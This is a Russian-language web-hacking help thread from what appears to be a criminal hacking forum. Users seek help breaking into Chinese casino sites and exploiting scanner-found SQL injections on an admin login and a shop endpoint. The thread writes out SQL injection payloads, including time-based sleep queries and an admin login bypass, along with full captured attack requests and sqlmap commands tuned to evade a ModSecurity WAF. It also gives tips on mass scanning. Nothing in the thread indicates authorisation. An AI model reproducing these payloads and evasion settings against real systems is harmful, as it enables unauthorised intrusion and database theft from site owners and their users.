• XSS.stack #1 – первый литературный журнал от юзеров форума

[web-hacking] Ваши вопросы

Отслеживать
Кто-то ломал китайские казино? Они сделаны +- по общему плану, с применением какого-то wjapp, на апишке которого все взаимодействие держится. Я уже просто все перепробовал и пока глухо.
 
Пожалуйста, обратите внимание, что пользователь заблокирован
noonenowhere000 сказал(а):
Кто-то ломал китайские казино? Они сделаны +- по общему плану, с применением какого-то wjapp, на апишке которого все взаимодействие держится. Я уже просто все перепробовал и пока глухо.
А смысл с именно китайского казино?)
 
mayone сказал(а):
Код: 
POST /admin/login.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----------YWJkMxxzNDcw
Accept: */*
X-Requested-With: XMLHttpRequest
Referer: https://www.site.com/
Cookie: PHPSESSID=9e785a0aa2609xxxx31c6145b47a; humans_21909=1; cartNum=5368663
Content-Length: 397
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
Host: www.site.com
Connection: Keep-alive

------------YWJkMTQzNDcw
Content-Disposition: form-data; name="txtEMail"

-1' OR 3*2*1=6 AND 000255=000255 --
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="txtPW"

u]H[ww6KrA9F.x-F
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="loginType"

Normal
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="process"


------------YWJkMTQzNDcw--

вот, впихивал в тхт как вышк писал, ничего не выходит, но акунетикс то показывает что там бд есть..

Screenshot

Captured with Lightshot
prnt.sc
--dbms="mysql" --tamper=between --time-sec=32 --level=5 --risk=3 --dbs
Вот интересно, а зачем акунеткс пишет Original value ?
 
mayone сказал(а):
ну так я его вставил вместо -1' OR 3*2*1=6 AND 000255=000255 --, выше же выкладывал что запихивал в тхт,
Убери тампер и попробуй --level=5 --risk=3

Ну и так как скуля в авторизации админа попробуй зайти используя логин например такой ' or login='admin' --
 
etc/passwd сказал(а):
Вот интересно, а зачем акунеткс пишет Original value ?
иногда это оказывается полезным, когда ты пытаешься уже на сайте воспроизвести запрос. Я как правило сначала киндаю оригинальный запрос, потом уже начинаю играться с ним
 
BLUA сказал(а):
иногда это оказывается полезным, когда ты пытаешься уже на сайте воспроизвести запрос. Я как правило сначала киндаю оригинальный запрос, потом уже начинаю играться с ним
Это был сарказм.
 
ко
BLUA сказал(а):
Скрытое содержимое
все ровно не хочет оно выводить, все сделал как ты и говрил, так же все(
Код: 
it is recommended to perform only basic UNION tests if there is not at least one other (potential) technique found. Do you want to reduce the number of requests? [Y/n] Y
[02:45:27] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[02:45:54] [INFO] testing 'Generic UNION query (random number) - 1 to 10 columns'
[02:46:23] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[02:46:51] [INFO] testing 'MySQL UNION query (random number) - 1 to 10 columns'
[02:47:19] [WARNING] (custom) POST parameter 'MULTIPART #1*' does not seem to be injectable
[02:47:19] [CRITICAL] all tested parameters do not appear to be injectable. If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could try to use option '--tamper' (e.g. '--tamper=space2comment')
[02:47:19] [WARNING] HTTP error codes detected during run

не пойму как акунетикс вывел бд
 
подскажите еще плиз, давно вам (если сканили конечно) попадалась уязвимость в движке XCART (в плане SQL INJ). Сколько пересканил именно xcart доменов , ниче не попадалось .У них какаято договоренность с Акунетиксом что ли))
 
Последнее редактирование:
mayone сказал(а):
ко

все ровно не хочет оно выводить, все сделал как ты и говрил, так же все(
Код: 
it is recommended to perform only basic UNION tests if there is not at least one other (potential) technique found. Do you want to reduce the number of requests? [Y/n] Y
[02:45:27] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[02:45:54] [INFO] testing 'Generic UNION query (random number) - 1 to 10 columns'
[02:46:23] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[02:46:51] [INFO] testing 'MySQL UNION query (random number) - 1 to 10 columns'
[02:47:19] [WARNING] (custom) POST parameter 'MULTIPART #1*' does not seem to be injectable
[02:47:19] [CRITICAL] all tested parameters do not appear to be injectable. If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could try to use option '--tamper' (e.g. '--tamper=space2comment')
[02:47:19] [WARNING] HTTP error codes detected during run

не пойму как акунетикс вывел бд
добавь -v3 к предыдущей команде, так будет виден код ошибки, но походу тут мешает WAF
 
etc/passwd сказал(а):
Вот интересно, а зачем акунеткс пишет Original value ?
А как сравнивать, есть уязвимость или нет, например при boolean-based, или time-based. Принтабелных полей нет, "выводной" ошибки нет.
mayone сказал(а):
ко

все ровно не хочет оно выводить, все сделал как ты и говрил, так же все(
Код: 
it is recommended to perform only basic UNION tests if there is not at least one other (potential) technique found. Do you want to reduce the number of requests? [Y/n] Y
[02:45:27] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[02:45:54] [INFO] testing 'Generic UNION query (random number) - 1 to 10 columns'
[02:46:23] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[02:46:51] [INFO] testing 'MySQL UNION query (random number) - 1 to 10 columns'
[02:47:19] [WARNING] (custom) POST parameter 'MULTIPART #1*' does not seem to be injectable
[02:47:19] [CRITICAL] all tested parameters do not appear to be injectable. If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could try to use option '--tamper' (e.g. '--tamper=space2comment')
[02:47:19] [WARNING] HTTP error codes detected during run

не пойму как акунетикс вывел бд
Попробуй --tamper="space2comment,randomcase,modsecurityversioned"
Просто WAFmodsec из халявных самый популярный. Акунетикс тебе полный запрос показывает, вот и глянь как он бд вывел, епт.
mayone сказал(а):
подскажите еще плиз, давно вам (если сканили конечно) попадалась уязвимость в движке XCART (в плане SQL INJ). Сколько пересканил именно xcart доменов , ниче не попадалось .У них какаято договоренность с Акунетиксом что ли))
зачем акунетиксом сканить бажные цмс? Там и так всё известно бл#ть.
 
Acunetix нашел вот такую скулю
Код: 
POST /path/to/page HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: application/json, text/javascript, */*; q=0.01
x-requested-with: XMLHttpRequest
Referer: https://referer.com/
Cookie: PHPSESSID=1cc58d2e516fae0feab7e970c90f9552; wp_ga4_customerGroup=NOT+LOGGED+IN; private_content_version=fc40cc678bd31867822f05cc470658b9; mage-cache-storage=%7B%7D;
Content-Length: 139
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
Host: target.com
Connection: Keep-alive

product_ids[]=(select(0)from(select(sleep(15)))v)/*'%2B(select(0)from(select(sleep(15)))v)%2B'"%2B(select(0)from(select(sleep(15)))v)%2B"*/
Веб-приложение реально засыпает, SQLinj присутствует, но как sqlmap'у передать правильно? Если просто астериксом в параметр product_ids[] - не находит...
 
kazakboo сказал(а):
Acunetix нашел вот такую скулю
Код: 
POST /path/to/page HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: application/json, text/javascript, */*; q=0.01
x-requested-with: XMLHttpRequest
Referer: https://referer.com/
Cookie: PHPSESSID=1cc58d2e516fae0feab7e970c90f9552; wp_ga4_customerGroup=NOT+LOGGED+IN; private_content_version=fc40cc678bd31867822f05cc470658b9; mage-cache-storage=%7B%7D;
Content-Length: 139
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
Host: target.com
Connection: Keep-alive

product_ids[]=(select(0)from(select(sleep(15)))v)/*'%2B(select(0)from(select(sleep(15)))v)%2B'"%2B(select(0)from(select(sleep(15)))v)%2B"*/
Веб-приложение реально засыпает, SQLinj присутствует, но как sqlmap'у передать правильно? Если просто астериксом в параметр product_ids[] - не находит...
sqlmap -r "target_post.txt" -p "product_ids[]"--random-agent --batch --risk=3 --level=5 --banner

в target_post.txt засунуть

POST /path/to/page HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: application/json, text/javascript, */*; q=0.01
x-requested-with: XMLHttpRequest
Referer: https://referer.com/
Accept-Encoding: gzip,deflate,br
Host: target.com
Connection: Keep-alive

product_ids[]=*
 
BLUA сказал(а):
sqlmap -r "target_post.txt" -p "product_ids[]"--random-agent --batch --risk=3 --level=5 --banner

в target_post.txt засунуть

POST /path/to/page HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: application/json, text/javascript, */*; q=0.01
x-requested-with: XMLHttpRequest
Referer: https://referer.com/
Accept-Encoding: gzip,deflate,br
Host: target.com
Connection: Keep-alive

product_ids[]=*
К сожалению это не работает, sqlmap не видит тут инъекцию.
 
kazakboo сказал(а):
Acunetix нашел вот такую скулю
Код: 
POST /path/to/page HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: application/json, text/javascript, */*; q=0.01
x-requested-with: XMLHttpRequest
Referer: https://referer.com/
Cookie: PHPSESSID=1cc58d2e516fae0feab7e970c90f9552; wp_ga4_customerGroup=NOT+LOGGED+IN; private_content_version=fc40cc678bd31867822f05cc470658b9; mage-cache-storage=%7B%7D;
Content-Length: 139
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
Host: target.com
Connection: Keep-alive

product_ids[]=(select(0)from(select(sleep(15)))v)/*'%2B(select(0)from(select(sleep(15)))v)%2B'"%2B(select(0)from(select(sleep(15)))v)%2B"*/
Веб-приложение реально засыпает, SQLinj присутствует, но как sqlmap'у передать правильно? Если просто астериксом в параметр product_ids[] - не находит...
sqlmap -r "target_post.txt" -p "product_ids[]"--random-agent --batch --risk=3 --level=5 --banner

в target_post.txt засунуть

POST /path/to/page HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: application/json, text/javascript, */*; q=0.01
x-requested-with: XMLHttpRequest
Referer: https://referer.com/
Accept-Encoding: gzip,deflate,br
Host: target.com
Connection: Keep-alive

product_ids[]=*
kazakboo сказал(а):
К сожалению это не работает, sqlmap не видит тут инъекцию.
ты на сайте через прокси-перехватчик сам проверь, есть ли там инъекция

окунь, это не всемогущий, он даже в своей реке не самая страшная рыба...
при использование автоматических средств сканирования, есть такой термин - ложно положительное срабатывание
 
BLUA сказал(а):
sqlmap -r "target_post.txt" -p "product_ids[]"--random-agent --batch --risk=3 --level=5 --banner

в target_post.txt засунуть

POST /path/to/page HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: application/json, text/javascript, */*; q=0.01
x-requested-with: XMLHttpRequest
Referer: https://referer.com/
Accept-Encoding: gzip,deflate,br
Host: target.com
Connection: Keep-alive

product_ids[]=*

ты на сайте через прокси-перехватчик сам проверь, есть ли там инъекция

окунь, это не всемогущий, он даже в своей реке не самая страшная рыба...
при использование автоматических средств сканирования, есть такой термин - ложно положительное срабатывание
Удостоверился сразу через Burp, sleep срабатывает.
 
x17_ сказал(а):
Умеет ли masscan в https? Как просканить массово https ресурсы по заданным банерам?
Не, masscan не работает на уровне https
Обратись к веб фазерам. Либо скань http (если есть такая возможность в твоем кейсе) и фильтруй вывод по нужным тебе https банерам каким-нибудь скриптом.
 
kazakboo сказал(а):
Удостоверился сразу через Burp, sleep срабатывает.
А с оригинальным параметром как ведёт себя страница. Видишь в таких узких местах нужно смотреть всю эту хуе.у. Так больше в сторону изотерики
 
admin


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх